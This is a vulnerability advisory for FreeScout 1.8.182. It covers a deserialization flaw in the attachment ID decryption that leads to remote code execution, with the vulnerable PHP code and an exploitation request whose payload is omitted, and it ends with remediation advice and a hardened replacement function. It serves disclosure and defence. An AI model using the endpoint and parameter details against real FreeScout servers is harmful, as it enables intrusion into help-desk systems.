Deserialization of untrusted data leads to Remote code execution (RCE) [9]
Product: FreeScout
Version: 1.8.182
CWE-ID:
• CWE-502: Deserialization of Untrusted Data
• CAPEC-586: Object Injection
CVSS vector v.4.0: 8.6 (AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
Description: The application performs deserialization of data that can be tampered with. An attacker can create objects of arbitrary classes, as well as fully control their properties, thereby allowing them to manipulate the web application's logic.
Vulnerable scenarios: /conversation/ajax
Vulnerable parameters:
• POST attachments_all[]
• POST attachments[]
Exploitation conditions: authorized user, APP_KEY knowledge
Recommendations: Configure the web server to prevent the receipt of untrusted deserialized data or, if the architecture allows, use alternative data formats such as JSON or XML instead of serialized objects.
If this is not possible, follow the guidelines below:
• Explicitly define data types during deserialization;
• Ensure data integrity checks (e.g., using an HMAC hash function);
• Create a separate object to store deserialized data, as this causes the data to pass through secure input validation;
• Use transient fields to denote data that should not be serialized.
Researchers: Daniil Satyaev, Roman Cheremnykh, Artem Danilov (Positive Technologies)
Research
Vulnerable code:
Listing Code snippet calling the vulnerable function Helper::decrypt (app/Http/Controllers/ConversationController.php, lines 3159-3171)
public function decodeAttachmentsIds($attachments_list)
{
    foreach ($attachments_list as $i => $attachment_id) {
        $attachment_id_decrypted = \Helper::decrypt($attachment_id);
        if ($attachment_id_decrypted == $attachment_id) {
            unset($attachments_list[$i]);
        } else {
            $attachments_list[$i] = $attachment_id_decrypted;
        }
    }
    return $attachments_list;
}
The code uses the insecure function \Helper::decrypt, which deserializes the decrypted value and thereby leads to Remote Code Execution (RCE).
Exploitation scenario:
Listing HTTP request exploiting «Deserialization of untrusted data»
POST /conversation/ajax HTTP/1.1
Host: freescout.web-hacks.ru
Cookie: <session cookies omitted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Csrf-Token: IqCjwN7WYawh0rIQDJajIrBu5GhCQVfvD5Axgkw2
X-Requested-With: XMLHttpRequest
Content-Length: 1288
Origin: https://freescout.web-hacks.ru
Referer: https://freescout.web-hacks.ru/conversation/53
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
_token=IqCjwN7WYawh0rIQDJajIrBu5GhCQVfvD5Axgkw2&conversation_id=53&mailbox_id=4&is_note=&is_phone=&type=&thread_id=117&customer_id=&is_create=1&to%5B%5D=zzxxcc%40zxc.ru&subject=zxc&attachments_all%5B%5D=<encrypted payload omitted>&attachments%5B%5D=<value omitted>&body=%3Cdiv%3Ezxc%3C%2Fdiv%3E&status=2&user_id=27&after_send=2&after_send_default=2&action=send_reply
The same problem with send_reply is also present in the EndUserPortal module.
Listing Vulnerable code (processReplyAttachments)
public function processReplyAttachments($request)
{
    $has_attachments = false;
    $attachments = [];
    if (!empty($request->attachments_all)) {
        //$embeds = [];
        $attachments_all = $this->decodeAttachmentsIds($request->attachments_all);
        if (!empty($request->attachments)) {
            $attachments = $this->decodeAttachmentsIds($request->attachments);
        }
        // if (!empty($request->embeds)) {
        //     $embeds = $this->decodeAttachmentsIds($request->embeds);
        // }
        $attachments_to_remove = array_diff($attachments_all, $attachments);
        if (count($attachments) && $attachments_to_remove != count($attachments)/* != count($embeds)*/) {
            $has_attachments = true;
        }
        //$attachments_to_remove = array_diff($attachments_to_remove, $embeds);
        Attachment::deleteByIds($attachments_to_remove);
    }
    return [
        'has_attachments' => $has_attachments,
        'attachments' => $attachments,
    ];
}
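As an added example (not FreeScout's own code or its fix), a hardened replacement for decodeAttachmentsIds() that both call sites above could use: it assumes Laravel's Crypt facade, whose decryptString() verifies the MAC but never calls unserialize(), and it accepts a decrypted value only when it is a numeric attachment id.

```php
<?php
// Added example, not FreeScout project code. Assumes a Laravel application
// where attachment ids were produced with Crypt::encryptString((string) $id).
// Crypt::decryptString() checks the HMAC and returns the plaintext as a string
// without deserializing it, so a crafted payload cannot instantiate objects.

use Illuminate\Contracts\Encryption\DecryptException;
use Illuminate\Support\Facades\Crypt;

/**
 * Decrypt a list of encrypted attachment ids from the request and keep only
 * values that decrypt to a plain integer id.
 *
 * @param  array<int, mixed> $attachments_list raw request values
 * @return array<int, int>   decrypted numeric attachment ids
 */
function decodeAttachmentsIdsSafe(array $attachments_list): array
{
    $ids = [];
    foreach ($attachments_list as $encrypted) {
        // Nested arrays or empty strings can never be valid ciphertext.
        if (!is_string($encrypted) || $encrypted === '') {
            continue;
        }
        try {
            // No unserialize() here: the result is always a string.
            $plain = Crypt::decryptString($encrypted);
        } catch (DecryptException $e) {
            // Wrong key, tampered MAC or malformed envelope: drop the value
            // instead of passing it on (the original code only dropped values
            // that came back unchanged).
            continue;
        }
        // The only legitimate plaintext is a decimal id; reject anything else
        // so that even a serialized string that somehow decrypts cleanly is
        // never handed to Attachment::deleteByIds().
        if (!ctype_digit($plain)) {
            continue;
        }
        $ids[] = (int) $plain;
    }
    return $ids;
}
```

Because the returned list holds only integers, processReplyAttachments() can keep its array_diff() logic unchanged while Attachment::deleteByIds() receives nothing but ids.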